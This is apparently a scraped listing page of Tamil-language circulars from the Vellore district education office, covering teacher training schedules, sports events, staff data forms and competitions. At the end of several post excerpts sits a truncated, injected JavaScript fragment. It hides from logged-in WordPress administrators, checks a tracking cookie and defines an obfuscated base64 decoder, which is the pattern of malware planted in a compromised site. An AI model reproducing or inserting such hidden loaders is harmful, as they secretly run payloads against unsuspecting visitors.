மற்ற செய்திகள்

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள தாவரவியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 11.12.2025 முதல் 17.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சேலம் பயிற்சி நடைபெறும் நாள்- 11.12.2025 முதல் 17.12.2025 முடிய இணைப்பு தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் PG Botany YERCAUD TRAING 11.12.2025 TO 13.12.2025 AND 15.12.2025 (2)Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.get

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள வேதியியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 04.12.2025 முதல் 13.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சென்னை, மதுரை, கோயம்புத்தூர் மற்றும் வேலூர் பயிற்சி நடைபெறும் நாள்- 04.12.2025 முதல் 13.12.2025 முடிய இணைப்பு வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் Chemistry Annexure 12 updated (1) (1)-23-28Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{i

பள்ளிக் கல்வி-வேலூர் மாவட்டம்- உடற்கல்வி- 2025-2026 ஆம் கல்வியாண்டில் மாநில அளவிலான 66வது குடியரசு தின குழு விளையாட்டுப் போட்டிகள்(RDG) -நடைபெறும் இடம் தேதி போன்ற விவரங்கள் தெரிவித்தல்-சார்பு.

சார்ந்த பள்ளி தலைமையாசிரியர்/முதல்வர்கள் கவனத்திற்கு. Google Map Link: https://maps.app.goo.gl/A6nisoeFu4M1R2sP8 trichy.RDG (1)Download RDG RESULTS 25-26.U.17Download _66th RDG-OfficialsDownload Team.manager.instructionsDownload SOP for Protection of Girls in Sports_ Instructions (1)Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி –   வேலூர் மாவட்டம் – தமிழ்நாடு அமைச்சுப்பணி –  பள்ளிக் கல்வித் துறையின் கீழ் செயல்படும் அனைத்து அரசு / நகராட்சி உயர், மேல்நிலைப் பள்ளிகள் – ஆசிரியரில்லாத பணியாளர்களின் விபரங்கள்  இணைப்பிலுள்ள கூகுள் படிவத்தில் பூர்த்தி செய்தல் – சார்பு.

https://docs.google.com/spreadsheets/d/1VhpN9LBLwcbKBrv76H7L5mTnIxHGS472J0tT2k9JS9Q/edit?usp=sharing 5864 A1 2025 NON TEACHING STAFF DETAILSDownload முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – SMC மூலம் பணிநியமனம் செய்யப்பட்ட தற்காலிக பட்டதாரி ஆசிரியர்கள் மற்றும் முதுகலையாசிரியர்கள் 2025 நவம்பர் மாதம் பணிபுரிந்த விவரம் – கோருதல் – தொடர்பாக.

SMC மூலம் பணிநியமனம் செய்யப்பட்ட தற்காலிக பட்டதாரி ஆசிரியர்கள் மற்றும் முதுகலையாசிரியர்கள் நவம்பர் 2025 மாதத்தில் பணிபுரிந்த விவரம் மற்றும் அதற்கான காரணம் ஆகியவற்றை இத்துடன் இணைக்கப்பட்டுள்ள படிவத்தில் பூர்த்தி செய்து நவம்பர் 2025 மாதத்தின் தெளிவான வருகைப் பதிவேட்டின் நகலை இணைத்து தனிநபர் மூலமாக 02.12.2025 அன்று மாலை 05.00 மணிக்குள் இவ்வலுவலகத்தில் மறுநினைவூட்டுக்கு இடமின்றி தவறாமல் சமர்ப்பிக்குமாறு அனைத்து அரசு/நகரவை/உயர்/மேல்நிலைப்பள்ளி தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. SMC பணியாளர்களின் அசல் வருகைப் பதிவேடு தவறாமல் சரிபார்ப்பிற்காக அலுவலகத்திற்கு உடன் கொடுத்தனுப்ப வேண்டும் என சார்ந்த பள்ளி தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. மேலும் அக்டோபர் 2025 மாதத்திற்கு ஊதியம் பெற்று வழங்கிய ECS நகல் மற்றும் பற்றுச்சீட்டுடன் இணைத்து சமர்ப்பிக்குமாறும் அனைத்து அரசு/நகரவை/உயர்/மேல்

slip test -8 sslc&12th STD -question set -reg

Tamil 28.11.2025Download XII ENGLISH 28.11.2025Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி-வேலூர் மாவட்டம்-பாரத சாரண சாரணியர் இயக்க ஆசிரியர்களுக்கு 28.11.2025-ஸ்ரீவெங்கடேஸ்வரா மேல்நிலைப் பள்ளியில் நடைபெறும் புத்தாக்க மற்றும் ஒருங்கிணைந்த பயிற்சி நடைபெறதல்-பயிற்யில் பங்குபெற தெரிவித்தல்-சார்பு.

New Doc 11-27-2025 14.10Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர்.

பள்ளிக்கல்வி – வேலூர் மாவட்டம் அரசு தொடக்க/நடுநிலை/உயர்/மேல்நிலைப் பள்ளிகள் – ஆசிரியர்கள்  புதிய முயற்சிகளுக்கு அரசின் சார்பாக பாராட்டுச் சான்றிதழ் வழங்க – அரசின் ஆணை பெறப்பட்டது- உரிய நடவடிக்கை மேற்கொள்ள தெரிவித்தல் – சார்பு

best teacher awardDownload //ஒப்பம்// முதன்மை கல்வி அலுவலர், வேலூர் .

பள்ளிக் கல்வி  – தமிழ் வளர்ச்சித் துறை- 2021-22ஆம் ஆண்டிற்கான மானியக் கோரிக்கை அறிவிப்பு – நாட்டிற்காகப் பாடுபட்ட தலைவர்களின் பிறந்தநாளன்று ஆண்டுதோறும் மாவட்ட அளவில் பள்ளி மாணாக்கர்களுக்கான பேச்சுப் போட்டிகள் நடத்திப் பரிசுகள் வழங்குதல் –  2025- 2026ஆம் ஆண்டில் அண்ணல் காந்தியடிகள், ஜவகர்லால் நேரு பிறந்த நாளை முன்னிட்டு பேச்சுப் போட்டிகள் நடைபெறுதல்- தொடர்பாக

5888.B5.26.11.2025(TAMIL VALARCHI THURAI POTTI)Download tamilvalarchi vithimuraikalDownload //ஒப்பம்// முதன்மைக்  கல்வி அலுவலர்,   வேலூர்.

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள கணக்குப்பதிவியல் மற்றும் வணிகவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள கணக்கு பதிவியல் மற்றும் வணிகவியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 01.12.2025 முதல் 18.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த கணக்கு பதிவியல் மற்றும் வணிகவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: மதுரை, திருச்சி, கோயம்புத்தூர் மற்றும் வேலூர் பயிற்சி நடைபெறும் நாள்- 01.12.2025 முதல் 18.12.2025 முடிய இணைப்பு கணக்கு பதிவியல் மற்றும் வணிகவியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் Accountancy Commerce Annexure 12